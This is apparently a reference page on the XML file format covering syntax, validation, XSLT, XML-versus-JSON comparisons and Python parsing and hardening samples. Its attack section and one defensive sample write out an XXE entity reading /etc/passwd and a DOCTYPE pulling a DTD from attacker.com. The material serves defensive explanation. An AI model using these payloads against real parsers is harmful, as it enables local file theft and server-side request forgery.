Extensible Markup Language
XML encodes structured data as nested elements with attributes in human-readable, machine-parseable text. Standardized by the W3C in 1998, XML underpins document formats (DOCX, SVG), SOAP services, configuration files, and data interchange across enterprise systems.
XML is a markup format. Transforming it requires XSLT or schema-specific processing.
Common questions
What is the difference between well-formed and valid XML?
Well-formed XML follows syntax rules: proper nesting, quoted attributes, a single root element, and correct escaping. Valid XML is well-formed AND conforms to a schema (XSD, DTD, or RELAX NG) that defines allowed elements, attributes, and data types. A document can be well-formed but not valid.
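As a rough illustration of the first half of that distinction, the sketch below tests well-formedness only, using Python's standard-library xml.etree.ElementTree. The helper name is_well_formed is made up for this example. The standard library does not validate against XSD, DTD, or RELAX NG, so a validity check would need a separate schema-aware library.

```python
import xml.etree.ElementTree as ET


def is_well_formed(text: str) -> bool:
    """Return True if `text` parses as XML, False on any syntax error."""
    try:
        ET.fromstring(text)
    except ET.ParseError:
        return False
    return True


samples = {
    "nested correctly": "<a><b/></a>",
    "overlapping tags": "<a><b></a></b>",
    "two root elements": "<a/><b/>",
    "unquoted attribute": "<a x=1/>",
}

for label, doc in samples.items():
    print(f"{label}: {is_well_formed(doc)}")
```

A document that passes this check can still be invalid, for example if it uses an element the schema does not define.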
Is XML still used or has JSON replaced it?
XML remains dominant in enterprise systems, regulated industries (healthcare HL7, finance FpML/XBRL), document formats (DOCX, SVG, RSS), and SOAP web services. JSON replaced XML primarily for REST APIs and browser-side data exchange. Both formats are actively used for different purposes.
What is an XXE attack and how do I prevent it?
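XXE (XML External Entity) injection exploits DOCTYPE entity declarations to read local files, trigger SSRF requests, or cause denial of service via entity expansion. Prevent it by disabling DTD processing and external entity resolution in your XML parser. In Python lxml: etree.XMLParser(resolve_entities=False, no_network=True). In Java, XMLConstants.FEATURE_SECURE_PROCESSING alone is not guaranteed to block external entities in every JAXP implementation, so also disallow DOCTYPE declarations where the parser supports it: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true).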
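Where an application never needs DTDs, one conservative option is to refuse any document that carries a DOCTYPE at all, which removes the entity machinery XXE depends on. The sketch below does this with Python's standard-library expat bindings. The names DoctypeForbidden and reject_doctype are hypothetical, and this is a pre-check under that assumption rather than a complete hardening guide.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Parse `xml_bytes` and raise DoctypeForbidden if a DOCTYPE is seen.

    Malformed input still raises xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Stop before any entity declared in the DTD can be processed.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


payload = (
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<foo>&xxe;</foo>"
)

try:
    reject_doctype(payload)
except DoctypeForbidden as exc:
    print("blocked:", exc)
```

Documents without a DOCTYPE pass through unchanged, so the check can sit in front of whatever parser the application already uses.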
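Why does my XML parser reject control characters or null bytes?
XML 1.0 forbids most ASCII control characters (0x00-0x08, 0x0B, 0x0C, 0x0E-0x1F) in all contexts, including CDATA sections. Tab (0x09), line feed (0x0A), and carriage return (0x0D) are the only control characters allowed. Remove or replace the forbidden bytes before parsing. XML 1.1 relaxes this restriction by allowing most control characters as character references (the null byte remains forbidden), but it is rarely used.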
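A minimal sketch of that cleanup step, assuming the text has already been decoded to a Python string. The function name strip_forbidden_controls is illustrative, and the pattern covers only the ASCII ranges listed above, not the other code points XML 1.0 excludes (such as U+FFFE and U+FFFF).

```python
import re

# ASCII control characters that XML 1.0 forbids.
# Tab (0x09), line feed (0x0A) and carriage return (0x0D) are left alone.
_FORBIDDEN_CONTROLS = re.compile(r"[\x00-\x08\x0B\x0C\x0E-\x1F]")


def strip_forbidden_controls(text: str, replacement: str = "") -> str:
    """Remove (or replace) characters an XML 1.0 parser would reject."""
    return _FORBIDDEN_CONTROLS.sub(replacement, text)


dirty = "Widget\x00 A\tblue\x0b\n"
clean = strip_forbidden_controls(dirty)
print(repr(clean))
```

Passing a visible replacement such as "?" instead of the empty string makes it easier to spot where data was altered.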
What makes .XML special
What is an XML file?
XML (Extensible Markup Language) is a markup language designed for storing and transporting structured data. The W3C published the first XML specification in 1998 as a simplified, human-readable alternative to SGML. Unlike HTML, XML has no predefined tags — developers define their own element names to match their data domain. This extensibility made XML the foundation for dozens of specialized formats still in use today.
XML is both human-readable and machine-parseable, making it suitable for configuration files, data exchange protocols, document formats, and web services. While JSON has replaced XML for many web API use cases, XML remains dominant in enterprise systems, document formats (DOCX, XLSX, SVG), and regulated industries.
How to open XML files
- Any web browser — Built-in XML viewer with collapsible tree
- VS Code (Windows, macOS, Linux) — Syntax highlighting, formatting, XML Schema validation
- Notepad++ (Windows) — XML tree view with plugin
- XMLSpy (Windows) — Professional XML editor with visual designers
- IntelliJ IDEA / WebStorm — IDE-level XML support
Technical specifications
| Property | Value |
|---|---|
| Standard | W3C Recommendation (1998, XML 1.0; 2004, XML 1.1) |
| Encoding | UTF-8, UTF-16 (required); others declared in prolog |
| Validation | DTD, XSD (XML Schema), RELAX NG |
| Transformation | XSLT stylesheets transform XML to HTML, PDF, other XML |
| Querying | XPath expressions, XQuery language |
| MIME type | application/xml or text/xml |
Common use cases
- Configuration files: web.config (ASP.NET), pom.xml (Maven), AndroidManifest.xml
- Data exchange: SOAP web services, EDI, financial messaging (FIXML, FpML)
- Document formats: DOCX, XLSX, PPTX, and ODT are ZIP archives containing XML files
- Vector graphics: SVG (Scalable Vector Graphics) is XML
- Syndication: RSS and Atom feeds are XML
- Sitemaps: sitemap.xml files for search engine indexing
XML document structure
<?xml version="1.0" encoding="UTF-8"?>
<catalog>
  <product id="101">
    <name>Widget A</name>
    <price currency="USD">29.99</price>
    <inStock>true</inStock>
  </product>
</catalog>
The optional XML declaration (<?xml ... ?>) appears first. Elements must be properly nested and closed. Attributes appear inside opening tags. XML is case-sensitive (<Name> and <name> are different elements).
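To show how that structure maps onto parsed data, here is a short sketch that reads the catalog above with Python's standard-library xml.etree.ElementTree. The dictionary keys are arbitrary choices for this example, not part of any XML convention.

```python
import xml.etree.ElementTree as ET

CATALOG = b"""<?xml version="1.0" encoding="UTF-8"?>
<catalog>
  <product id="101">
    <name>Widget A</name>
    <price currency="USD">29.99</price>
    <inStock>true</inStock>
  </product>
</catalog>"""

root = ET.fromstring(CATALOG)

products = []
for product in root.findall("product"):
    price = product.find("price")
    products.append({
        "id": product.get("id"),                  # attribute on <product>
        "name": product.findtext("name"),         # text of child element
        "price": float(price.text),               # element text is always a string
        "currency": price.get("currency"),        # attribute on <price>
        "in_stock": product.findtext("inStock") == "true",
    })

print(products)

# Element names are case-sensitive, so this lookup finds nothing.
print(root.find("Product"))
```

Every value arrives as text, which is why the price and the boolean are converted explicitly.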
XML vs JSON
| Feature | XML | JSON |
|---|---|---|
| Comments | ✅ <!-- comment --> | ❌ |
| Attributes | ✅ Key-value on elements | ❌ |
| Namespaces | ✅ (xmlns:) | ❌ |
| Schema validation | ✅ XSD, DTD | ✅ JSON Schema |
| Verbosity | More verbose | More concise |
| Browser parsing | Built-in DOMParser | Built-in JSON.parse |
Validation with XML Schema (XSD)
XSD files define which elements, attributes, and data types are allowed in an XML document. Enterprise systems use XSD to validate incoming data before processing. An XML document is well-formed if it follows XML syntax rules, and valid if it conforms to its associated schema.
XSLT transformations
XSLT (XSL Transformations) stylesheets transform XML into other formats — HTML for display, different XML vocabularies for system integration, or plain text for reporting. XSLT is a declarative language that matches XML nodes with templates and outputs the transformed result. It remains widely used in publishing workflows and legacy enterprise integration.
.XML compared to alternatives
| Formats | Criteria | Winner |
|---|---|---|
| .XML vs .JSON | Verbosity: JSON represents equivalent data in 30-50% fewer bytes by eliminating closing tags, attribute syntax, and namespace declarations. | JSON wins |
| .XML vs .JSON | Schema validation: XSD provides typed validation with inheritance, complex type definitions, and namespace-aware constraints. JSON Schema is capable but less mature for multi-namespace document validation. | XML wins |
| .XML vs .JSON | Comment support: XML supports inline comments (<!-- ... -->). JSON has no comment syntax per RFC 8259. | XML wins |
| .XML vs .YAML | Enterprise adoption: XML dominates regulated industries (finance, healthcare, government) with established standards like HL7, FpML, and XBRL. YAML is concentrated in DevOps and cloud-native tooling. | XML wins |
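The verbosity row can be checked on your own data. The sketch below serializes one small record both ways using only the Python standard library and compares byte counts. The record and the JSON layout are assumptions made for this example, and the saving will vary with how the XML uses attributes, namespaces, and whitespace.

```python
import json
import xml.etree.ElementTree as ET

record = {"id": "101", "name": "Widget A", "price": 29.99, "inStock": True}

# Build the XML form with no indentation or XML declaration.
catalog = ET.Element("catalog")
product = ET.SubElement(catalog, "product", id=record["id"])
ET.SubElement(product, "name").text = record["name"]
ET.SubElement(product, "price").text = str(record["price"])
ET.SubElement(product, "inStock").text = "true" if record["inStock"] else "false"
xml_bytes = ET.tostring(catalog, encoding="unicode").encode("utf-8")

# Build the JSON form with compact separators for a like-for-like comparison.
json_bytes = json.dumps(
    {"catalog": {"product": record}}, separators=(",", ":")
).encode("utf-8")

saving = 1 - len(json_bytes) / len(xml_bytes)
print(f"XML:  {len(xml_bytes)} bytes")
print(f"JSON: {len(json_bytes)} bytes")
print(f"JSON is {saving:.0%} smaller for this record")
```

Both outputs compress well, so the gap usually narrows once gzip or a similar transport encoding is applied.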
Technical reference
- MIME Type: application/xml
- Developer: World Wide Web Consortium (W3C)
- Year Introduced: 1998
- Open Standard: Yes
Binary Structure
XML is a text format, not binary. An XML document begins with an optional prolog: the XML declaration (<?xml version="1.0" encoding="UTF-8"?>) specifying version and character encoding, followed by an optional DOCTYPE declaration referencing a DTD or inline entity definitions. The document body consists of a single root element containing nested child elements.
Elements are delimited by start tags (<tag>) and end tags (</tag>), with empty elements using self-closing syntax (<tag/>). Elements may carry attributes as name-value pairs within the start tag. Text content, CDATA sections (<![CDATA[...]]>), processing instructions (<?target data?>), and comments (<!-- ... -->) appear within or between elements. Namespaces use the xmlns attribute to partition element names into URI-identified vocabularies.
UTF-8 is the default encoding; UTF-16 is also natively supported. Files may start with a UTF-8 BOM (EF BB BF) before the XML declaration, though UTF-8 does not require one. Well-formedness requires proper nesting, quoted attribute values, and a single root element. Validation against a schema (XSD, DTD, RELAX NG) enforces structural and type constraints beyond well-formedness.
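Namespaces and CDATA are the two pieces of that structure that most often surprise people when parsing. The sketch below shows how Python's standard-library xml.etree.ElementTree exposes them. The http://example.com/ns URI and the ex:rank element are invented for the example.

```python
import xml.etree.ElementTree as ET

DOC = (
    b'<feed xmlns="http://www.w3.org/2005/Atom" '
    b'xmlns:ex="http://example.com/ns">'
    b"<title><![CDATA[Q&A <live>]]></title>"
    b"<ex:rank>3</ex:rank>"
    b"</feed>"
)

root = ET.fromstring(DOC)

# The parser expands each prefix into its URI, written as {uri}localname.
print(root.tag)

# Prefixes used for lookup are local to this dict; only the URIs must match.
ns = {"atom": "http://www.w3.org/2005/Atom", "ex": "http://example.com/ns"}
title = root.find("atom:title", ns).text
rank = root.find("ex:rank", ns).text

# CDATA content comes back as ordinary text with no escaping applied.
print(title, rank)

# Without the namespace the lookup misses, because <title> lives in the Atom vocabulary.
print(root.find("title"))
```

The prefix chosen in the document (here the default namespace and ex) does not have to match the prefix used in the lookup dictionary.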
Attack Vectors
- XXE (XML External Entity) injection — DOCTYPE entity declarations can reference local files (file:///etc/passwd), internal network URLs (SSRF), or parameter entities that exfiltrate data to attacker-controlled servers
- Billion laughs attack — exponentially expanding entity definitions (<!ENTITY x10 '&x9;&x9;&x9;...') consume gigabytes of RAM from a few kilobytes of XML, causing denial of service
- SSRF via external DTD — an XML document referencing an external DTD (<!DOCTYPE foo SYSTEM 'http://attacker.com/evil.dtd'>) causes the parser to fetch a remote resource, enabling server-side request forgery
- XPath injection — user input concatenated into XPath expressions without sanitization allows authentication bypass and data extraction from XML datastores
Mitigation: FileDex processes XML files entirely in the browser. No external entity resolution, no DTD fetching, no server-side parsing. The browser's DOMParser runs in a sandboxed context with no filesystem or network access from parsed entities.
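For the XPath injection vector listed above, one simple defence is to keep user input out of the expression entirely: select nodes with a fixed path and compare values in application code. The sketch below does that with Python's standard-library xml.etree.ElementTree. The users document and the find_user helper are hypothetical. Libraries that support XPath variable binding offer another route.

```python
import xml.etree.ElementTree as ET

USERS = b"""<users>
  <user name="alice" role="admin"/>
  <user name="bob" role="viewer"/>
</users>"""


def find_user(root: ET.Element, name: str):
    """Return the <user> element whose name attribute equals `name`, or None.

    The path is constant; `name` is only ever compared as a plain string,
    so quotes or XPath operators inside it have no special meaning.
    """
    for user in root.iter("user"):
        if user.get("name") == name:
            return user
    return None


root = ET.fromstring(USERS)

print(find_user(root, "alice").get("role"))

# A classic injection string is treated as a literal name and matches nothing.
print(find_user(root, "' or '1'='1"))
```

The trade-off is a linear scan instead of an indexed query, which is usually acceptable for small XML datastores.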